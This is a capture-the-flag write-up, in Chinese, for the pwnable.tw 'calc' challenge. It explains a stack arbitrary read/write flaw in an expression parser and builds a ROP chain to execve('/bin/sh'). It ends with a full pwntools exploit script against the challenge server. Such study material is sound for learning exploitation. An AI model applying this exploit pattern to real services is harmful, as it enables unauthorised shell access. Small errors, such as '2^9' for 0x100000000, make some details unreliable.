Pwnable.tw calc

这题的漏洞还是挺有意思的

先逆向分析一下binary的逻辑

看calc函数

通过get_expr获得输入,会过滤掉除了+,-,*,/,%和数字以外的字符

再传入parse_expr处理

注意用于存放表达式的buffer每次都会清空,而且有canary保护

再看parse_expr函数

主要的逻辑是解析表达式,把操作符 放入s[v8]

把操作数放入a2,这里需要注意的是a2的第一个元素是操作数的个数,之后才依次是各操作数

然后把a2和s[v8]传入eval中计算

eval函数

这里的a1就是前面的a2

所以相当于 a2[a2[0]-1] op= a2[a2[0]]  得到计算结果

一直到这里都没有看到什么明显的洞

参考了别人的wp:

http://dogewatch.github.io/2017/04/10/pwnable.tw-Part1/

http://www.tuicool.com/articles/VNzqea3

问题出在当输入的表达式是以运算符开头的比如“+300”时

此时数组a2的内容是 a2[0]=1,a2[1]=300

运算后的结果是a2[0]=301,a2[1]=300

更进一步,如果我们的输入是“+300+1”

那么进过第二次计算,实际执行的是 a2[300]=a2[300]+1

相当于可以执行栈上的任意写,由于并不是通过溢出来写的,因此canary无法提供防护

但要劫持控制流还需要泄露栈地址

看calc中的printf('%d',v2[v1-1]),v2是栈上的数组,v1是上面的a2[0],是我们可控的,因此这里可以执行栈上的任意读,就可以泄露栈的信息

要泄露栈上的信息还要弄清楚栈的具体结构,通过阅读calc的汇编和GDB调试,可以得到如下图的结构


因此输入+361 就可以泄露出返回地址

由于开启了NX,不能直接执行shellcode,需要通过ROP劫持控制流,而且并没有动态链接库,不能使用GOT 调sys函数,还是只能通过int 80h进行系统调用

sys_execv 需要的参数

eax=0xb  ebx 指向 “/bin/sh”  ecx=0 edx=0

通过ROPgadget查找合适的指令,需要构造这样的栈

370 “/sh”

369 "/bin"

368 int 80h #8049a21

367 ebx的值 #通过泄露栈上的内容计算得到

366 0x0

365 0x0

364 pop edx; pop exc; pop ebx; ret #80701d0

363 dec,eax; ret #8065773

362 0x0

361(返回地址)mov eax,0xc; pop edi; ret  #808f936

分析清楚了要构造的场景,剩下的就靠我们通过输入的畸形表达式来计算并设置initpool的361~370这十个栈单元。对于每一个栈单元,我们首先获取其内的值,而后计算该值与目标值的差,最后相减即可。比如我们要将362位置上的值变为11,首先输入“+362”得到当前362栈单元的值135184896,然后计算135184896-11=135184885,最后输入“+362-135184885”将栈内值修改为11。

比较麻烦的是ebx的值的就算,这只能通过相对偏移进行计算。我们可以从栈上泄露出main的ebp,main的ebp同calc函数的返回地址之间是main的栈空间,ebx同calc函数的返回地址之间的偏移是32字节(369-361)。因此需要知道main函数的栈有多大。通过main的汇编,观察ebp和esp的操作

.text:08049453                mov    ebp, esp

.text:08049455                and    esp, 0FFFFFFF0h

.text:08049458                sub    esp, 10h

根据泄露出的ebp,得到其栈空间应该为24byte。这边还有一个问题,ebp应该是无符号数,但是被当作有符号数输出,输出的是负数,需要加上0x100000000(2^9)才是无符号数的真实值。得到ebx的值之后只需要利用上述的任意写漏洞写栈上的空间即可。

后来发现这边还有一个坑。就是写ebx的时候如果使用加上0x100000000后的值作为main_ebp,那么ebx的目标值会很大,输入+367+(目标值-diff)后会产生一个溢出,导致最后实际的值并不是我们想要的。此时依旧可以用输出值(一个负数)作为main_ebp,这样可以避免溢出,并且正确设置ebx的值

最终的利用脚本:

from pwn import *

HOST = 'chall.pwnable.tw'

PORT = 10100

con=remote(HOST,PORT)

context.log_level="debug"

con.recv(1024)

stack=[0x808f936,0x0,0x8065773,0x80701d0,0,0,0,0x8049a21,u32("/bin"),u32("/sh\x00")]

def get_ebx():

    con.sendline("+360")

    i=con.recv()

    main_ebp=int(i)+0x100000000

    #size=main_ebp-(main_ebp& 0xFFFFFFF0-16)

    size=24 #size is 24

    ebx=main_ebp-(size+4)+4*8

    print hex(ebx)#usigned value

    ebx=int(i)-(size+4)+4*8

    print hex(ebx) #signed value

    return ebx

def set_val(index,val):

    con.sendline("+"+str(index))

    val1=int(con.recv(1024))

    print val1

    diff=val-val1

    if(diff<0):

        payload="+"+str(index)+str(diff)

    else:

        payload="+"+str(index)+"+"+str(diff)

    con.sendline(payload)

    con.recv(1024)

    print "set",str(index),"  : ",hex(val)

    if(index==367):

        con.sendline("+"+str(index))

        val2=int(con.recv(1024))+0x100000000

        print hex(val2)

stack[6]=get_ebx()

print stack

base=361

for x in stack:

    set_val(base,x)

    base+=1

con.sendline("aaaaa")

con.sendline("bbbbb")

con.interactive("shell:")

推荐阅读更多精彩内容